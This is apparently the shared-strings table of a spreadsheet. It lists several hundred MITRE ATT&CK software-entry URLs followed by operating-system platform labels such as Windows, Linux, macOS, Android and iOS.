  <si>
    <t>https://attack.mitre.org/software/S0628</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0410</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0168</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0049</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0460</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0032</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0423</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0026</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0249</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0535</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0551</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0493</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0597</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0588</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0421</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0290</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0477</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0536</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0531</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0237</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0342</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0417</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0632</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0008</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0561</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0406</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0132</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0047</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0151</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0037</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0499</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0214</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0246</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0224</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0391</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0071</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0061</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0617</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0170</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0544</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0087</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0394</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0135</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0009</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0601</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0232</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0376</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0431</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0040</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0070</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0068</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0322</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0321</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0203</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0398</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0537</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0483</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0101</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0278</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0434</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0357</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0604</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0259</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0463</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0260</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0231</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0100</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0581</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0189</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0015</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0163</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0528</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0389</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0044</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0201</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0283</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0648</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0325</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0215</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0088</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0265</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0585</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0487</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0387</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0276</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0271</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0288</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0526</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0607</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0599</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0437</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0250</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0641</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0162</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0156</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0356</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0236</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0349</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0395</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0211</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0362</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0513</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0372</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0397</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0447</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0582</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0451</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0042</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0121</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0532</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0010</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0409</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0282</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0413</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0485</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0317</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0652</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0167</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0303</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0449</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0500</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0459</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0175</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0576</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0530</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0443</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0455</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0339</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0179</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0133</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0051</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0280</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0084</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0083</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0080</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0079</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0553</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0407</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0149</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0284</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0256</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0233</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0205</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0228</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0336</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0637</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0247</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0590</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0102</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0272</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0630</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0210</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S00039</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0056</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0034</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0108</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0104</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0033</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0457</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0198</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0508</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0118</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0385</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0359</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0353</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0299</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0368</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0286</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0644</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0346</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0340</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0439</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0138</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0285</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0365</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0052</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0264</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0229</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0165</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0402</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0352</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0594</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0072</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0598</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0016</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0626</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0399</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0208</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0122</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0556</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0316</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0289</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0587</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0643</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0158</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0517</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0048</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0097</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0501</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0124</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0291</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0254</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0435</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0013</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0067</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0428</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0012</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0518</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0453</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0216</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0378</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0150</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0177</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0139</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0441</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0145</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0194</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0393</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0223</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0371</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0184</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0113</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0654</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0279</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0238</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0613</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0029</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0078</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0147</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0196</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0197</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0192</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0583</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0650</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0269</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0262</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0481</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0565</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0629</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0458</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0055</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0241</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0364</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0169</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0295</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0495</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0416</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0172</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0539</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0326</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0153</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0075</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0511</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0019</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0332</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0375</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0166</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0592</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0125</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0174</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0379</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0496</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0258</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0433</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0403</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0448</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0400</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0112</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0270</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0240</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0411</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0103</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0090</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0148</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0358</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0313</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0253</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0446</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0085</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0074</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0370</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0111</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0461</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0195</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0053</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0345</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0185</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0382</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0639</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0596</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0140</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0546</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0450</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0294</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0444</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0445</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0028</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0063</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0217</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0589</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0610</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0549</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0623</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0419</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0468</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0327</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0633</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0218</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0226</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0649</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0159</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0273</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0627</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0615</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0516</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0157</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0035</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0543</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0374</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0646</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0227</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0324</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0305</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0225</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0390</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0058</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0188</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0328</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0380</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0142</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0491</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0603</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0559</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0562</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0578</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0018</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0242</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0519</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0060</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0464</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0096</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0098</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0011</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0586</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0467</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0329</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0057</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0164</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0560</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0545</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0146</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0595</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0558</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0131</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0183</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0424</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0266</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0427</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0307</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0306</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0308</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0094</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0178</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0436</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0647</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0199</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0302</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0263</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0116</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0333</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0221</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0130</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0275</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0022</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0386</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0452</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0136</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0476</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0636</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0207</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0442</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0257</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0418</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0506</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0180</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0366</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0612</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0579</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0109</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0515</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0514</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0645</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0206</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0155</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0466</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0219</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0191</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0176</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0059</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0430</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0141</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0041</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0312</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0489</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0314</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0161</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0341</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0298</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0653</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0123</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0297</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0658</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0318</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0490</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0117</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0388</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0311</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0248</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0251</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0494</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0287</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0027</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0230</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0330</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0086</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0350</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0412</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0533</t>
  </si>
  <si>
    <t>Windows, Linux</t>
  </si>
  <si>
    <t>Linux</t>
  </si>
  <si>
    <t>macOS</t>
  </si>
  <si>
    <t>Android</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>iOS</t>
  </si>
  <si>
    <t>macOS, Linux, Windows</t>
  </si>
  <si>
    <t>Linux, Containers</t>
  </si>
  <si>
    <t>Linux, macOS, Windows</t>
